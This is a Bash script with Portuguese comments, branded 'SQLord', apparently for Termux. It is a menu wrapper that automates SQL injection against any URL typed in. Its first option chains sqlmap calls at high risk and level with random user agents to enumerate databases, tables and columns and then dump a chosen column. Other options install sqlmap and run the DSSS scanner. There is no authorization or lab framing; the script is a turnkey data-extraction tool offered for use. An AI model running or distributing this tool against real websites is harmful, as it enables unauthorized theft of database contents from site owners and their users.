#! /bin/bash
#
#Limpar a tela
clear
#
#Escrever Lord Termux
figlet MRX800
sleep 0.5
#Limpar a tela
clear
#Fazendo o programa dormir por 2 segundos
sleep 0.3
#
#
figlet SQLord
#
#
#MENU
echo
echo "\033[1;34m[\033[1;31m1]>> \033[1;33mUsar sqlmap Automatico"
echo "\033[1;34m[\033[1;31m2]>> \033[1;33mInstalar sqlmap"
echo "\033[1;34m[\033[1;31m3]>> \033[1;33mInstalar DSSS"
echo "\033[1;34m[\033[1;31m4]>> \033[1;33mVer se o site é vulneravel"
#
#
#Escolher entre as quatro opcoes
#obtigado por usar

read -p "[+]=>" opcao
#
#
#
if [ "$opcao" = "1" ];then
figlet Sqlmap
#
 echo "\033[1;32m\n\n[+]=> INICIANDO SQLMAP AUTOMATICO...";sleep 0.4
#
#Read para digitar a url
echo "\033[1;36m\n[+]=> DIGITE OU COLE A URL PARA O SQLMAP\033[1;31m"
read -p "[+]=> " url
#
#Começa a listar as databases
sqlmap -u $url --risk 3 --level 3 --batch --dbs --random-agent
#
#Read para digitar o nome da database listada
echo "\033[1;36m[+]=> DIGITE O NOME DA DATABASE\033[1;31m"
read -p "[+]=> " db
#
#Começa a listar as tabelas
sqlmap -u $url --risk 2 --level 2 --batch -D $db --tables --random-agent 
#
#Read para digitar o nome da tabela
echo "\033[1;36m[+]=> DIGITE O NOME DA TABELA\033[1;31m"
read -p "[+]=> " tabela
#
#Começa a listar as colunas
sqlmap -u $url --risk 2 --level 2 --batch -D $db -T $tabela --columns --random-agent 
#
#Read para digitar o nome da coluna
echo "\033[1;36m[+]=> DIGITE O NOME DA COLUNA\033[1;31m"
read -p "[+]=> " coluna
#
#Extrai todo o trabalho feito
sqlmap -u $url --risk 2 --level 2 --batch -D $db -T $tabela -C $coluna  --dump
fi
if [ "$opcao" = "2" ];then
pkg update
pkg install upgrade
pkg install sqlmap -y
fi
if [ "$opcao" = "3" ];then
clear
figlet INSTALL
git clone https://github.com/stamparm/DSSS
fi
if [ "$opcao" = "4" ];then
clear
figlet DSSS
 echo "\033[1;36m[+]=> DIGITE OU COLE A URL DO SITE\033[1;31m"
#
read -p "[+]>>" url
#
#Entrando na pasta do DSSS
cd DSSS
#Executando
python3 dsss.py --url $url
fi

